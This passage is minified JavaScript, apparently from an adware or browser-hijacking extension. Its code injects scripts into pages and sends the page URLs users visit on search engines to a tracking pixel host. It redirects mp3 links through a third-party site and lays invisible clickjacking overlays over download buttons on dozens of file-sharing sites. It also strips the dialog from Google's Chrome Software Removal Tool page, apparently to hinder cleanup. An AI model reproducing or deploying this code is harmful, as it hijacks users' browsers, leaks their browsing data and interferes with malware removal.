path=/\"};a.readCookie=function(a){a+=\r\n\"=\";for(var e=document.cookie.split(\";\"),d=0;d<e.length;d++){for(var c=e[d];\" \"==c.charAt(0);)c=c.substring(1,c.length);if(0==c.indexOf(a))return c.substring(a.length,c.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};c.ajax={get:function(a,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",a,!0),this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&b(c.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(a,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",\r\na,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&e(c.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};c.waitForTokens={};c.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};\r\nc.waitForElement=function(a,b,e,d){var f=c.query_selector_all(a);clearTimeout(c.waitTimeout);if(25<k.waitForElementCounter)return b(null);if(\"undefined\"==typeof f||1>f.length){if(c.waitForTokens[d])return b(null);var g=arguments.callee;c.waitTimeout=setTimeout(function(){k.waitForElementCounter++;g(a,b,e,d)},e)}else{if(c.waitForTokens[d])return b(null);c.waitForTokens[d]=!0;k.waitForElementCounter=0;return b(f)}};c.flushWaitForTokens=function(){c.waitForTokens={}};c.getRandomInt=function(a,b){return Math.floor(Math.random()*\r\n(b-a+1))+a};c.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(a){return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=c.dhtml_prop_name(b);return\"object\"==typeof a.currentStyle&&null!=a.currentStyle&&\"undefined\"!=typeof a.currentStyle?a.currentStyle:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};c.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=\r\na.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};c.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:\r\nfunction(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};c.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,e,c){return c.toUpperCase()})};c.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return new RegExp(a)};c.throttle=function(a,b){var e=null;return function(){var c=this,f=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(c,f)},b)}};c.epoch=function(){return(new Date).getTime()};\r\nc.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();c.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};c.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};\r\nc.match_url=function(a,b){for(var e=0;e<b.length;e++)if(\"string\"==typeof b[e]){var d;d=/^\\/.+\\/$/.test(b[e])?new RegExp(b[e]):c.wildcard_to_regex(b[e]);if(d instanceof RegExp&&d.test(a))return!0}};c.ping=function(a){for(var b=[\"google\",\"bing\",\"yahoo\",\"youtube\"],c=0;c<b.length;c++)if(-1<location.hostname.indexOf(b[c])){var d=new Image,f=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<f.length&&(f=encodeURIComponent(location.hostname));var g=encodeURIComponent(location.hostname);\r\nd.src=k.pixelHost+\"?hid=4273800016501002566&eid=1089&pid=11214&prodid=338&v=\"+k.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=CA&pr=\"+b[c]+\"&host=\"+g+\"&ref=\"+f}};c.getAllText=function(a){for(var b=\"\",c=0;c<a.length;c++)b+=a.textContent?a.textContent:a.innetText;return b};c.duplicateElement=function(a){var b=document.createElement(a.nodeName.toLowerCase()),e=!1;a.getAttribute(\"href\")&&b.setAttribute(\"href\",\"javascript:void(0);\");for(var d in a)if(\"src\"==\r\nd||\"width\"==d||\"height\"==d)b[d]=a[d];else if(\"style\"==d)for(var f in a[d])a[d][f]&&\"\"!=a[d][f]&&(b[d][f]=a[d][f]);else e||\"nodeValue\"!=d&&\"textContent\"!=d&&\"innetText\"!=d&&\"className\"!=d||0!=a.children.length||(b[d]=a[d],e=!0);for(e=0;e<a.childNodes.length;e++)if(3==a.childNodes[e].nodeType)b.appendChild(document.createTextNode(a.childNodes[e].textContent?a.childNodes[e].textContent:a.childNodes[e].innerText));else{d=c.duplicateElement(a.childNodes[e]);f=c.getAllText(d.childNodes);var g=a.childNodes[e].textContent?\r\na.childNodes[e].textContent:a.childNodes[e].innerText;g&&(g=g.replace(f,\"\"),\"\"!=g&&(d.textContent?d.textContent=g:d.innerText=g));b.appendChild(d)}return b}};if(-1<window.location.href.indexOf(\"google.com/chrome/srt\")&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")){try{var h=parseInt(window.navigator.appVersion.match(/Chrome\\/(\\d+)\\./)[1],10)}catch(p){return}if(!(38>=h)){for(h=0;h<document.links.length;h++){var l=document.links[h],m=l.getAttribute(\"href\");if(m&&-1<m.indexOf(\"#dialog-contents\")){var m=\r\nk.utils.duplicateElement(l),n=l.parentNode;n.insertBefore(m,l);n.removeChild(l)}}(h=document.getElementById(\"dialog-contents\"))&&h.remove()}}};(function(){try{window.top==window.self&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")&&\"http:\"==window.location.protocol&&chrome.storage.local.get(\"cdbmnd\",function(a){if(!a.cdbmnd&&!localStorage.getItem(\"cdbmnd\")&&(a=document.getElementsByTagName(\"a\"),a.length))for(var b=0;b<a.length;b++)if(a&&a.href&&\"mp3\"==a.href.substr(-3)){var c=a.href;a.setAttribute(\"href\",\"http://mp3juices.se/media/\"+encodeURIComponent(a.innerHTML)+\"/mid/\"+encodeURIComponent(encodeURIComponent©)+\"/el/1\");a.setAttribute(\"id\",\"sdfsdfsfds\"+b);document.getElementById(\"sdfsdfsfds\"+b).addEventListener(\"click\",function(){chrome.storage.local.set({cdbmnd:\"2\"});localStorage.setItem(\"cdbmnd\",\"2\")},!1)}})}catch(d){}})();;new function(){var p=this;this.activeZds={\"uploading.com\":0,\"dirpy.com\":0,\"go4up.com\":1,\"mp3olimp.org\":1,\"hulkload.com\":1,\"free-tv-video-online.me\":1,\"ehd.c\":1,\"hesefiles.c\":1,\"sharebeast.com\":0,\"coolrom.com\":1,\"ebookbrowsee.net\":1,\"mirrorcreator.com\":0,\"cloud-vibe.com\":0,\"mp3seal.com\":0,\"mp3vampire.com\":0,\"minecraftdl.com\":0,\"leunlckr.co\":0,\"go.theadsnet.com\":1,\"ziddu.com\":1,\"opensubtitles.org\":1,\"romptfile.co\":1,\"pensoftwareupdater.co\":1,\"veehd.com\":1,\"ullypcgames.ne\":0,\"llplayer.com.b\":1,\"ubtitulosespanol.or\":1,\n\"ubtitles4free.ne\":1,\"legendasbrasil.org\":1,\"reeroms.co\":0,\"eneral-ebooks.co\":0,\"stream2watch.me\":1,\"kickass.to\":1,\"kickass.so\":1,\"pensubtitles.us\":1,\"uploadrocket.net\":1,\"programas-gratis.net\":1,\"programasgratis.es\":1,\"programasejogos.com\":1,\"uploading.com\":1,\"flexydrive.com\":1,\"media1fire.com\":1,\"softwareandgames.com\":1,\"baixarjogos.com\":1,\"programmesetjeux.com\":1,\"descargarjuegos.com\":1,\"hotfiles.ro\":0,\"vitanclub.net\":0,\"getsecuredfiles.com\":1,\"mirrorcreator.com\":1,\"mestorrents.com\":1,\"vitorrent.net\":1};\nthis.utils=new function(){var h=this;h.sendPixels=function(e){var h;if(e instanceof Array)for(var l=0;l<e.length;l++){var m=e[l];h=new Image;h.src=m}else h=new Image,h.src=e};h.isFalse=function(e){return\"undefined\"==typeof e||0===e.length||null===e};h.cookie=new function(){var e=this;e.createCookie=function(e,h,m){if(m){var n=new Date;n.setTime(n.getTime()+864E5*m);m=\"; expires=\"+n.toGMTString()}else m=\"\";document.cookie=e+\"=\"+h+m+\"; path=/\"};e.readCookie=function(e){e+=\"=\";for(var h=document.cookie.split(\";\"),\nm=0;m<h.length;m++){for(var n=h[m];\" \"==n.charAt(0);)n=n.substring(1,n.length);if(0==n.indexOf(e))return n.substring(e.length,n.length)}return null};e.eraseCookie=function(h){e.createCookie(h,\"\",-1)}};h.ajax={get:function(e,k){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",e,!0),this.xhr.onreadystatechange=function(){4==h.ajax.xhr.readyState&&k(h.ajax.xhr.responseText)},this.xhr.send()}catch(l){}},post:function(e,k,l){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",e,!0);this.xhr.setRequestHeader(\"Content-type\",\n\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==h.ajax.xhr.readyState&&l(h.ajax.xhr.responseText)};k=encodeURIComponent(k);this.xhr.send(k)}};h.waitForTokens={};h.addScript=function(e,h){if(\"bing\"==h){var l=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(e);Element.prototype.appendChild=l}else document.getElementsByTagName(\"head\")[0].appendChild(e)};\nh.waitForElement=function(e,k,l,m){var n=h.query_selector_all(e);clearTimeout(h.waitTimeout);if(25<p.waitForElementCounter)return k(null);if(\"undefined\"==typeof n||1>n.length){if(h.waitForTokens[m])return k(null);var q=arguments.callee;h.waitTimeout=setTimeout(function(){p.waitForElementCounter++;q(e,k,l,m)},l)}else{if(h.waitForTokens[m])return k(null);h.waitForTokens[m]=!0;p.waitForElementCounter=0;return k(n)}};h.flushWaitForTokens=function(){h.waitForTokens={}};h.getRandomInt=function(e,h){return Math.floor(Math.random()*\n(h-e+1))+e};h.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(e){return{getPropertyValue:function(k){\"float\"==k&&(k=\"styleFloat\");k=h.dhtml_prop_name(k);return\"object\"==typeof e.currentStyle&&null!=e.currentStyle&&\"undefined\"!=typeof e.currentStyle[k]?e.currentStyle[k]:null}}}:function(e,h){return window.getComputedStyle(e,h)||{getPropertyValue:function(){}}};h.query_selector_all=document.querySelectorAll?function(e){try{return document.querySelectorAll(e)}catch(h){}}:function(e){var h=\ne.match(/^#([^,\\s]+)$/)||[];if(1<h.length)return e=document.getElementById(h[1])||void 0,\"undefined\"!=typeof e?[e]:[];h=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(h);document.__asya_qsaels=[];h.styleSheet.cssText=e+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};h.clone_object=window.JSON instanceof Object?function(e){if(e instanceof Object&&(e=JSON.stringify(e),\"string\"==typeof e))return JSON.parse(e)}:\nfunction(e){if(e instanceof Object){var h=new e.constructor,l;for(l in e)h[l]=arguments.callee(e[l]);return h}return e};h.dhtml_prop_name=function(e){return e.replace(/(\\-([a-z]){1})/g,function(e,h,m){return m.toUpperCase()})};h.wildcard_to_regex=function(e){e=e.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");e=e.replace(/\\*/g,\".*\");return new RegExp(e)};h.throttle=function(e,h){var l=null;return function(){var m=this,n=arguments;clearTimeout(l);l=setTimeout(function(){e.apply(m,n)},h)}};h.epoch=function(){return(new Date).getTime()};\nh.msie=function(){var e=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(e)&&(e=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(e)?!1:e}();h.version_ie_less=function(e){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=e?!0:!1};h.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};\nh.match_url=function(e,k){for(var l=0;l<k.length;l++)if(\"string\"==typeof k[l]){var m;m=/^\\/.+\\/$/.test(k[l])?new RegExp(k[l]):h.wildcard_to_regex(k[l]);if(m instanceof RegExp&&m.test(e))return!0}};h.ping=function(e){for(var h=[\"google\",\"bing\",\"yahoo\",\"youtube\"],l=0;l<h.length;l++)if(-1<location.hostname.indexOf(h[l])){var m=new Image,n=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<n.length&&(n=encodeURIComponent(location.hostname));var q=encodeURIComponent(location.hostname);\nm.src=p.pixelHost+\"?hid=4273800016501002566&eid=1089&pid=11214&prodid=338&v=\"+p.version+\"&ch=\"+e+\"&lan=\"+navigator.language+\"&cc=CA&pr=\"+h[l]+\"&host=\"+q+\"&ref=\"+n}};h.getAllText=function(e){for(var h=\"\",l=0;l<e.length;l++)h+=e.textContent?e.textContent:e.innetText;return h};h.duplicateElement=function(e){var k=document.createElement(e.nodeName.toLowerCase()),l=!1;e.getAttribute(\"href\")&&k.setAttribute(\"href\",\"javascript:void(0);\");for(var m in e)if(\"src\"==\nm||\"width\"==m||\"height\"==m)k[m]=e[m];else if(\"style\"==m)for(var n in e[m])e[m][n]&&\"\"!=e[m][n]&&(k[m][n]=e[m][n]);else l||\"nodeValue\"!=m&&\"textContent\"!=m&&\"innetText\"!=m&&\"className\"!=m||0!=e.children.length||(k[m]=e[m],l=!0);for(l=0;l<e.childNodes.length;l++)if(3==e.childNodes[l].nodeType)k.appendChild(document.createTextNode(e.childNodes[l].textContent?e.childNodes[l].textContent:e.childNodes[l].innerText));else{m=h.duplicateElement(e.childNodes[l]);n=h.getAllText(m.childNodes);var q=e.childNodes[l].textContent?\ne.childNodes[l].textContent:e.childNodes[l].innerText;q&&(q=q.replace(n,\"\"),\"\"!=q&&(m.textContent?m.textContent=q:m.innerText=q));k.appendChild(m)}return k};h.coverElement=function(e,h,l,m,n,q){var t=document.createElement(\"div\");t.style.width=h?h:\"100%\";t.style.height=l?l:\"100%\";t.style.zIndex=q?q:\"2000\";t.style.top=m?m:\"0\";t.style.left=n?n:\"0\";t.style.position=\"absolute\";h=e.parentNode;h.style.position=\"relative\";h.removeChild(e);h.appendChild(t)}};this[\"uploading.com\"]=new function(){this.init=\nfunction(){if(window.self===window.top&&location.host.toLowerCase().indexOf(\"ploading.com/files/\"))for(var h=typeof document.querySelectorAll?document.getElementsByTagName(\"div\"):document.querySelectorAll(\"div.method_title\"),e=0;e<h.length;e++){var k=h[e].className;k&&\"undefined\"!==typeof k&&-1<k.indexOf(\"method_title\")&&(k=h[e].getAttribute(\"onclick\"))&&\"undefined\"!==typeof k&&-1<k.indexOf(\"location.href\")&&(h[e].setAttribute(\"onclick\",\"void(0);\"),k=h[e].cloneNode(!0),h[e].parentNode.replaceChild(k,\nh[e]),k.setAttribute(\"onclick\",\"void(0);\"))}}};this[\"dirpy.com\"]=new function(){this.init=function(){try{f=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(e){}},-1< !navigator.userAgent.indexOf(\"chrome\")?f():(g=document.createElement(\"script\"),g.innerHTML=\"(\"+f.toString()+\")()\",document.body.appendChild(g))}catch(h){}new function(){-1<location.host.toLowerCase().indexOf(\"irpy.co\")&&(window.__irpyCount=0,window.__irpyInt=setInterval(function(){for(var e=\ndocument.links,h=0;h<e.length;h++){var l=e[h].getAttribute(\"href\");if(null!=l&&-1<l.toLowerCase().indexOf(\"dirpy.com/download/\")){l=document.createElement(\"div\");l.style.top=\"0\";l.style.width=\"100%\";l.style.height=\"100%\";l.style.cursor=\"pointer\";l.style.zIndex=\"2000\";l.style.position=\"absolute\";var m=e[h].parentNode;m.style.position=\"relative\";m.appendChild(l);clearInterval(window.__irpyInt)}}20<window.__irpyCount++&&clearInterval(window.__irpyInt)},250))}}};this[\"go4up.com\"]=new function(){this.init=\nfunction(){if(!window.__AAintervalCounter&&window.self==window.top&&-1<location.host.toLowerCase().indexOf(\"o4up.co\")){window.__AAintervalCounter=0;window.__AAinterval=setInterval(function(){var e=document.getElementById(\"linklist\");e.style.position=\"relative\";var h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.zIndex=\"2000\";h.style.height=\"100%\";h.style.width=\"100px\";h.style.right=\"30px\";h.style.top=\"0\";h.style.cursor=\"pointer\";e.appendChild(h);10<window.__AAintervalCounter&&\nclearInterval(window.__AAinterval)},1001);for(var h=document.getElementsByTagName(\"center\"),e=0;e<h.length;e++){var k=h[e].children[0];k&&k.setAttribute(\"href\",\"javascript:void(0);\");h[e].style.position=\"relative\";k=document.createElement(\"div\");k.style.position=\"absolute\";k.style.zIndex=\"2000\";k.style.height=\"100%\";k.style.width=\"100%\";k.style.right=\"0\";k.style.top=\"0\";k.style.cursor=\"pointer\";h[e].appendChild(k)}}}};this[\"mp3olimp.org\"]=new function(){this.init=function(){setTimeout(function(){for(var e=\ndocument.links,h=0;h<e.length;h++)if(\"return prepare_download_file(this);\"==e[h].getAttribute(\"onclick\")){var m=document.createElement(\"a\");m.className=\"link last\";m.setAttribute(\"href\",\"javascript:void(0);\");m.innerText?m.innerText=\"Download\":m.textContent=\"Download\";var n=e[h].parentNode,q=n.children[n.children.length-1];q&&(n.removeChild(e[h]),n.insertBefore(m,q))}},1E3);new function(){-1<window.location.host.toLowerCase().indexOf(\"p3olimp.or\")&&(window.__intCount=0,window.__int=setInterval(function(){var h=\ndocument.getElementById(\"download-manager-checkbox\");if(null!==h)try{h.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(e){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250))};-1<window.location.host.toLowerCase().indexOf(\"p3olimp.or\")&&(window.__intCount=0,window.__int=setInterval(function(){var h=document.getElementById(\"download-manager-checkbox\");if(null!==h)try{h.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(e){}window.__intCount++;\n10<window.__intCount&&clearInterval(window.__int)},250));if(-1<document.location.host.indexOf(\"p3olimp.or\")&&document.getElementsByClassName)for(c=document.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var h=document.getElementsByClassName(\"nasjfkla\"),e=0;e<h.length;e++)h[e].style.display=c.checked?\"block\":\"none\"},i=0;i<document.links.length;i++){var h=document.links[i],e=h.getAttribute(\"onclick\");e&&-1<e.indexOf(\"prepare_download_file\")&&(h=h.parentNode,h.style.position=\"relative\",\nb=document.createElement(\"div\"),b.className=\"nasjfkla\",b.style.position=\"absolute\",b.style.top=\"-2px\",b.style.left=\"92px\",b.style.width=\"71px\",b.style.height=\"16px\",b.style.zIndex=\"99999\",b.style.cursor=\"pointer\",h.appendChild(b))}-1<location.host.indexOf(\"p3olimp.or\")&&setTimeout(function(){for(var h=document.getElementById(\"leftside\"),e=0;e<h.children.length;e++)if(/\\bspnBook\\b/.test(h.children[e].className))for(var m=h.children[e].getElementsByTagName(\"a\"),n=0;n<m.length;n++)m[n].setAttribute(\"href\",\n\"#\"),m[n].setAttribute(\"target\",\"\")},1001)}};this[\"hulkload.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"file21desktop.com\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}new function(){-1<location.host.toLowerCase().indexOf(\"ulkload.co\")&&(window.___interCount=0,window.___interval=setInterval(function(){for(var h=document.getElementsByTagName(\"center\"),\ne=0;e<h.length;e++)if(0!=e&&!(-1<h[e].innerHTML.indexOf(\"adcopy-outer\")||-1<h[e].innerHTML.indexOf(\"btn_download\")||-1<h[e].innerHTML.indexOf(\"solvemedia puzzle widget\"))){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"1900\";k.style.position=\"absolute\";e==h.length-1?(k.style.bottom=\"0\",k.style.height=\"110px\"):k.style.top=\"0\";h[e].style.position=\"relative\";h[e].appendChild(k)}h=document.getElementById(\"cap\");null!=h&&(h.parentNode.style.position=\n\"relative\",h.parentNode.style.zIndex=\"2000\");20<window.___interCount++&&clearInterval(window.___interval)},500))}}};this[\"free-tv-video-online.me\"]=new function(){this.init=function(){if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){for(var h=document.getElementsByTagName(\"div\"),e=0;e<h.length;e++)if(h[e].style&&\"653px\"==h[e].style.width&&\"49px\"==h[e].style.height){var k=h[e];k.style.position=\"relative\";var l=document.createElement(\"div\");l.style.position=\"absolute\";\nl.style.cursor=\"pointer\";l.style.zIndex=\"2000\";l.style.width=\"100%\";l.style.height=\"50px\";l.style.top=\"0\";k.appendChild(l)}setTimeout(function(){for(var h=document.links,e=0;e<h.length;e++){var k=h[e].innerText?h[e].innerText:h[e].textContent;if(\"trackOutboundLink(this, 'Outbound Links', 'slinks.com'); return false;\"==h[e].getAttribute(\"onclick\")&&\"Stream Video Now!\"==k){k=document.createElement(\"a\");k.className=\"down\";k.setAttribute(\"href\",\"javascript:void(0);\");k.innerText?k.innerText=\"Stream Video Now!\":\nk.textContent=\"Stream Video Now!\";var l=h[e].parentNode,p=l.children[l.children.length-1];l.removeChild(h[e]);if(p)try{l.insertBefore(k,p)}catch(v){l.appendChild(k)}else l.appendChild(k)}}h=document.getElementsByTagName(\"a\");for(e=0;e<h.length;e++)if(\"getDownload();\"==h[e].getAttribute(\"onclick\"))if(k=document.createElement(\"p\"),k.className=\"dloadh\",k.setAttribute(\"href\",\"javascript:void(0);\"),k.innerText?k.innerText=\" \":k.textContent=\" \",l=h[e].parentNode,p=l.children[l.children.length-1],l.removeChild(h[e]),\np)try{l.insertBefore(k,p)}catch(w){l.appendChild(k)}else l.appendChild(k)},1E3);h=document.createElement(\"script\");h.type=\"text/javascript\";h[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var h=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+h.top+\"px;left:\"+h.left+\n\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(e){}}.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(h)}}};this[\"ehd.c\"]=new function(){this.init=function(){-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(g=document.createElement(\"img\"),g.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),g.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",\nf=document.getElementById(\"r1113566095\").parentNode,f.style.position=\"relative\",f.appendChild(g))}};this[\"hesefiles.c\"]=new function(){this.init=function(){-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\");if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var h=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",\n!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))h();else{var e=document.createElement(\"script\");e.type=\"text/javascript\";e.innerHTML=\"(\"+h.toString()+\")()\";document.body.appendChild(e)}}}};this[\"sharebeast.com\"]=new function(){this.init=function(){if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var h=document.getElementsByTagName(\"div\"),e;for(e in h)h[e]&&h[e].style&&\"fixed\"==h[e].style.position&&\"solid\"==\nh[e].style.borderBottomStyle&&(h[e].style.display=\"none\")}}};this[\"coolrom.com\"]=new function(){this.init=function(){for(var h=document.getElementsByTagName(\"img\"),e=0;e<h.length;e++)-1<h[e].src.indexOf(\"/images/download_large.png\")&&h[e].parentNode.setAttribute(\"href\",\"javascript:void(0);\");h=new Date;h.setTime(h.getTime()+2592E6);h=\"; expires=\"+h.toGMTString();document.cookie=\"installer=14604\"+h+\"; path=/;domain=.coolrom.com\"}};this[\"ebookbrowsee.net\"]=new function(){this.init=function(){}};this[\"mirrorcreator.com\"]=\nnew function(){this.init=function(){if(-1<document.location.host.indexOf(\"irrorcreator.co\"))for(var h=[\"verticdn.com\"],e=0;e<document.links.length;e++)for(var k=document.links[e],l=k.host,m=0;m<h.length;m++)h[m]==l&&(k.setAttribute(\"onclick\",\"return false\"),k.addEventListener(\"click\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"cloud-vibe.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"loud-vibe.co\")&&(a=document.getElementById(\"continue\"),\na.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1),a.addEventListener(\"mousedown\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"mp3seal.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"p3seal.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",\nfunction(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1),a.addEventListener(\"mousedown\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"mp3vampire.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"p3vampire.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1),a.addEventListener(\"mousedown\",\nfunction(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"minecraftdl.com\"]=new function(){this.init=function(){-1<document.location.href.indexOf(\"necraftdl.com/download.ph\")&&(a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"100%\",d.style.height=\"34px\",d.style.left=\"0\",d.style.cursor=\"pointer\",d.style.zIndex=9999,b.parentNode.insertBefore(d,b.previousSibling));if(-1<document.location.href.indexOf(\"necraftdl.com\"))for(i=\n0;i<document.links.length;i++){var h=document.links[i];\".exe\"==h.href.substr(-4)&&(h=h.parentNode,h.style.position=\"relative\",d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.top=0,d.style.left=0,d.style.width=\"100%\",d.style.height=\"100%\",d.style.cursor=\"pointer\",d.style.zIndex=9999,h.appendChild(d))}}};this[\"leunlckr.co\"]=new function(){this.init=function(){if(-1<document.location.host.indexOf(\"leunlckr.co\")){var h=document.getElementsByTagName(\"button\")[0],e=document.createElement(\"button\");\ne.className=h.className;e.innerHTML=h.innerHTML;h.parentNode.insertBefore(e,h);h.parentNode.removeChild(h)}}};this[\"go.theadsnet.com\"]=new function(){this.init=function(){-1<document.referrer.indexOf(\"go.theadsnet.com\")&&document.write(\"\");(function(){var h=0;try{if(-1<window.location.href.indexOf(\"ack-free.co\"))var e=setInterval(function(){try{var k=document.getElementById(\"ucd-countdown-1\"),m=[];m.push(1*k.children[2].children[1].children[1].innerText);m.push(1*k.children[2].children[2].children[1].innerText);\nm.push(1*k.children[3].children[1].children[1].innerText);m.push(1*k.children[3].children[2].children[1].innerText);for(var n=k=0;n<m.length;n++)k+=m[n];if(!(0<k)){clearInterval(e);var q=document.createElement(\"div\");q.style.position=\"absolute\";q.style.top=0;q.style.left=0;q.style.width=\"100%\";q.style.height=\"100%\";q.style.zIndex=\"9999\";q.style.cursor=\"pointer\";var p=document.getElementById(\"ucd-countdown-1-content\").children[1];p.style.position=\"relative\";p.appendChild(q)}}catch®{try{var v=0;jQuery.each(jQuery(\".ucd-figure.ucd-countdown-digit-bottom\"),\nfunction(){v+=1*jQuery(this).text()});if(0===v){clearInterval(e);var w=jQuery(\"#ucd-countdown-1-content iframe\"),x=w.parent();w.remove();x.html(\"<img title='Get Download' alt='latbut' src='http://i.imgur.com/At0oA5A.png' height='61' width='373'>\")}}catch(u){\"undefined\"!==typeof h&&30<++h&&clearInterval(e)}}},750)}catch(k){}})()}};this[\"ziddu.com\"]=new 